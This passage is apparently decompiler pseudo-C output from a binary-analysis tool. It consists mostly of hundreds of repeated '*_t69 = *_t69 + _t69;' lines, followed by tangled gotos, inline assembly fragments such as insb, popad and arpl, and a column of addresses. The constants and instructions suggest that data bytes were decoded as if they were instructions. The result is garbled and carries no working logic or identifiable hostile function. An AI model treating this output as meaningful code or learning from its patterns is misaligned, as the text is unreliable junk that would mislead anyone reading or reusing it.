                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *((intOrPtr*)(_t88 + 0x48)) =  *((intOrPtr*)(_t88 + 0x48)) + _t95;
                                  				_t97 = _t96 + 1;
                                  				_t134 = _t97;
                                  				if(_t134 == 0) {
                                  					L29:
                                  					_pop(_t97);
                                  					_t114 = _t114 + 1;
                                  					if(_t140 < 0) {
                                  						L51:
                                  						asm("insb");
                                  						_t108 = _t108 ^  *_t95;
                                  						L52:
                                  						_t114 = _t114 + 1;
                                  						 *_t69 =  *_t69 + _t69;
                                  						 *_t69 =  *_t69 + _t69;
                                  						_t89->i = _t89->i ^ _t95;
                                  						L53:
                                  						 *_t95 =  *_t95 ^ _t108;
                                  						_t108 = _t108 ^  *(_t108 + 0x39383736);
                                  						asm("popad");
                                  						asm("bound esp, [ebx+0x64]");
                                  						asm("o16 add [gs:eax], al");
                                  						 *_t69 =  *_t69 + _t69;
                                  						L54:
                                  						_t63 = _t69;
                                  						_t69 = _t108;
                                  						_t108 = _t63;
                                  						 *_t97 =  *_t97 ^ _t69;
                                  						if( *_t97 > 0) {
                                  							L59:
                                  							if(_t157 < 0) {
                                  								goto L52;
                                  							}
                                  							if(_t157 <= 0) {
                                  								L64:
                                  								asm("adc [fs:edi-0x4fdf0de3], dh");
                                  								_push(0x48);
                                  								if(_t158 >= 0) {
                                  									goto L54;
                                  								}
                                  								asm("repe fiadd word [ecx-0x42]");
                                  								_t158 = _v48 & _t88;
                                  								L66:
                                  								asm("ficomp dword [edx]");
                                  								L62:
                                  								_t69 = 0xbf1d91e7;
                                  								L63:
                                  								goto L64;
                                  							}
                                  							_t158 = _t69 - 0x1d91e7b8;
                                  							goto L62;
                                  						}
                                  						asm("popad");
                                  						_push(cs);
                                  						asm("out dx, al");
                                  						_t95 = 0x19990951;
                                  						asm("les ebp, [ebp+0x7]");
                                  						L56:
                                  						asm("insd");
                                  						_pop(es);
                                  						asm("invalid");
                                  						_push(0x70);
                                  						_t69 = _t69 ^ 0xa3e963a5;
                                  						_t157 = _t69;
                                  						L58:
                                  						 *0x329e6495 = _t69;
                                  						_push(cs);
                                  						asm("movsb");
                                  						_t69 = 0xe91e79dc;
                                  						asm("aad 0xe0");
                                  						_t89 = _t88;
                                  						asm("rcl byte [edi+0x9b64c2b], cl");
                                  						goto L59;
                                  					}
                                  					if(_t140 < 0) {
                                  						L41:
                                  						_push(0x43646c69);
                                  						L42:
                                  						_t88 =  &(_t88->i);
                                  						asm("insb");
                                  						asm("popad");
                                  						if(_t88 >= 0) {
                                  							goto L59;
                                  						}
                                  						 *_t69 =  *_t69 + _t69;
                                  						_push(_t95);
                                  						_t114 =  *(_t88 + 0x68) * 0;
                                  						L44:
                                  						asm("arpl [eax], bp");
                                  						 *_t69 =  *_t69 + _t69;
                                  						_t60 =  &(_t97[0x19]);
                                  						 *_t60 = _t97[0x19] + _t69;
                                  						_t148 =  *_t60;
                                  						if(_t148 == 0) {
                                  							goto L58;
                                  						}
                                  						asm("outsd");
                                  						asm("outsb");
                                  						asm("a16 push eax");
                                  						asm("popad");
                                  						if(_t148 == 0) {
                                  							goto L63;
                                  						}
                                  						_t108 = _t108 - 1;
                                  						asm("popad");
                                  						asm("insd");
                                  						_t89 =  &(_t89->i);
                                  						L47:
                                  						_t89 =  &(_t89->i);
                                  						 *_t69 =  *_t69 + _t69;
                                  						L48:
                                  						 *_t69 =  *_t69 + _t69;
                                  						L49:
                                  						_t88 = _t88 - 1;
                                  						if(_t88 < 0) {
                                  							goto L66;
                                  						}
                                  						asm("gs insb");
                                  						goto L51;
                                  					}
                                  					asm("arpl [ebx+0x65], sp");
                                  					if(_t140 < 0) {
                                  						goto L53;
                                  					}
                                  					 *_t69 =  *_t69 + _t69;
                                  					 *((intOrPtr*)(_t69 + 0x42)) =  *((intOrPtr*)(_t69 + 0x42)) + _t95;
                                  					L33:
                                  					_t89 = _t89 - 1;
                                  					_t114 = _t114 + 1;
                                  					 *_t69 =  *_t69 + _t69;
                                  					 *((intOrPtr*)(_t69 + 0x42)) =  *((intOrPtr*)(_t69 + 0x42)) + _t95;
                                  					_pop(_t97);
                                  					_push(_t97);
                                  					_t142 =  *(_t108 + 0x64) * 0x4449776f;
                                  					L34:
                                  					asm("outsb");
                                  					asm("fs outsd");
                                  					if(_t142 > 0) {
                                  						goto L47;
                                  					}
                                  					_t114 = _t114 + 1;
                                  					_t97[0x1a] = _t97[0x1a] + _t95;
                                  					asm("outsb");
                                  					L36:
                                  					asm("fs outsd");
                                  					if(_t142 > 0) {
                                  						goto L48;
                                  					}
                                  					asm("insb");
                                  					asm("popad");
                                  					if(_t142 >= 0) {
                                  						goto L56;
                                  					}
                                  					_t69 = _t69 & 0x50000064;
                                  					L39:
                                  					_push(_t69);
                                  					_t95 = _t95 + 1;
                                  					_t117 = _t114 + 1;
                                  					_t90 = _t89 - 1;
                                  					L40:
                                  					asm("popad");
                                  					asm("a16 jz 0x5");
                                  					 *_t69 =  *_t69 + _t69;
                                  					_t114 = _t117 + 1;
                                  					_t89 = _t90 - 1;
                                  					_pop(_t97);
                                  					_t88 =  &(_t88->i);
                                  					goto L41;
                                  				}
                                  				asm("popad");
                                  				if(_t134 == 0) {
                                  					goto L34;
                                  				}
                                  				_t108 = _t108 + 1;
                                  				if(_t108 < 0) {
                                  					goto L36;
                                  				}
                                  				asm("insd");
                                  				_t89 = _t89 - 1;
                                  				_t114 = _t114 + 1 - 1;
                                  				_t108 =  *(_t88 + 0x74) * 0x42485300;
                                  				_t136 = _t108;
                                  				if(_t136 < 0) {
                                  					goto L39;
                                  				}
                                  				if(_t136 > 0) {
                                  					goto L40;
                                  				}
                                  				_t108 = _t108 + 1;
                                  				_t137 = _t108;
                                  				asm("outsd");
                                  				if(_t137 < 0) {
                                  					goto L33;
                                  				}
                                  				asm("outsd");
                                  				asm("insb");
                                  				if (_t137 < 0) goto L25;
                                  				 *_t69 =  *_t69 + _t69;
                                  				_t69 = _t69 - 1;
                                  				_t108 = _t108 ^  *_t95;
                                  				 *((intOrPtr*)(_t114 + 1 + 0x3f + _t88 * 2)) =  *((intOrPtr*)(_t114 + 1 + 0x3f + _t88 * 2)) + _t88;
                                  				_t114 = _t88;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				_t138 =  *_t69;
                                  				_push(_t88);
                                  				if(_t138 == 0) {
                                  					goto L42;
                                  				}
                                  				if(_t138 == 0) {
                                  					goto L44;
                                  				}
                                  				asm("arpl [eax], ax");
                                  				_a96 = _a96 + _t69;
                                  				_t108 =  *(_t69 + _t69) * 0x75420000;
                                  				if(_t108 == 0) {
                                  					goto L49;
                                  				}
                                  				asm("outsd");
                                  				asm("outsb");
                                  				 *_t69 =  *_t69 + _t69;
                                  				_push(_t69);
                                  				_t95 = _t95 + 1;
                                  				_t140 = _t95;
                                  				goto L29;
                                  			}


































                                  0x00408101
                                  0x00408103
                                  0x00408105
                                  0x00408107
                                  0x00408109
                                  0x0040810b
                                  0x0040810d
                                  0x0040810f
                                  0x00408111
                                  0x00408113
                                  0x00408115
                                  0x00408117
                                  0x00408119
                                  0x0040811b
                                  0x0040811d
                                  0x0040811f
                                  0x00408121
                                  0x00408123
                                  0x00408125
                                  0x00408127
                                  0x00408129
                                  0x0040812b
                                  0x0040812d
                                  0x0040812f
                                  0x00408131
                                  0x00408133
                                  0x00408135
                                  0x00408137
                                  0x00408139
                                  0x0040813b
                                  0x0040813d
                                  0x0040813f
                                  0x00408141
                                  0x00408143
                                  0x00408145
                                  0x00408147
                                  0x00408149
                                  0x0040814b
                                  0x0040814d
                                  0x0040814f
                                  0x00408151
                                  0x00408153
                                  0x00408155
                                  0x00408157
                                  0x00408159
                                  0x0040815b
                                  0x0040815d
                                  0x0040815f
                                  0x00408161
                                  0x00408163
                                  0x00408165
                                  0x00408167
                                  0x00408169
                                  0x0040816b
                                  0x0040816d
                                  0x0040816f
                                  0x00408171
                                  0x00408173
                                  0x00408175
                                  0x00408177
                                  0x00408179
                                  0x0040817b
                                  0x0040817d
                                  0x0040817f
                                  0x00408181
                                  0x00408183
                                  0x00408185
                                  0x00408187
                                  0x00408189
                                  0x0040818b
                                  0x0040818d
                                  0x0040818f
                                  0x00408191
                                  0x00408193
                                  0x00408195
                                  0x00408197
                                  0x00408199
                                  0x0040819b
                                  0x0040819d
                                  0x0040819f
                                  0x004081a1
                                  0x004081a3
                                  0x004081a5
                                  0x004081a7
                                  0x004081a9
                                  0x004081ab
                                  0x004081ad
                                  0x004081af
                                  0x004081b1
                                  0x004081b3
                                  0x004081b5
                                  0x004081b7
                                  0x004081b9
                                  0x004081bb
                                  0x004081bd
                                  0x004081bf
                                  0x004081c1
                                  0x004081c3
                                  0x004081c5
                                  0x004081c7
                                  0x004081c9
                                  0x004081cb
                                  0x004081cd
                                  0x004081cf
                                  0x004081d1
                                  0x004081d3
                                  0x004081d5
                                  0x004081d7
                                  0x004081d9
                                  0x004081db
                                  0x004081dd
                                  0x004081df
                                  0x004081e1
                                  0x004081e3
                                  0x004081e5
                                  0x004081e7
                                  0x004081e9
                                  0x004081eb
                                  0x004081ed
                                  0x004081ef
                                  0x004081f1
                                  0x004081f3
                                  0x004081f5
                                  0x004081f7
                                  0x004081f9
                                  0x004081fb
                                  0x004081fd
                                  0x004081ff
                                  0x00408201
                                  0x00408203
                                  0x00408205
                                  0x00408207
                                  0x00408209
                                  0x0040820b
                                  0x0040820d
                                  0x0040820f
                                  0x00408211
                                  0x00408213
                                  0x00408215
                                  0x00408217
                                  0x00408219
                                  0x0040821b
                                  0x0040821d
                                  0x0040821f
                                  0x00408221
                                  0x00408223
                                  0x00408225
                                  0x00408227
                                  0x00408229
                                  0x0040822b
                                  0x0040822d
                                  0x0040822f
                                  0x00408231
                                  0x00408233
                                  0x00408235
                                  0x00408237
                                  0x00408239
                                  0x0040823b
                                  0x0040823d
                                  0x0040823f
                                  0x00408241
                                  0x00408243
                                  0x00408245
                                  0x00408247
                                  0x00408249
                                  0x0040824b
                                  0x0040824d
                                  0x0040824f
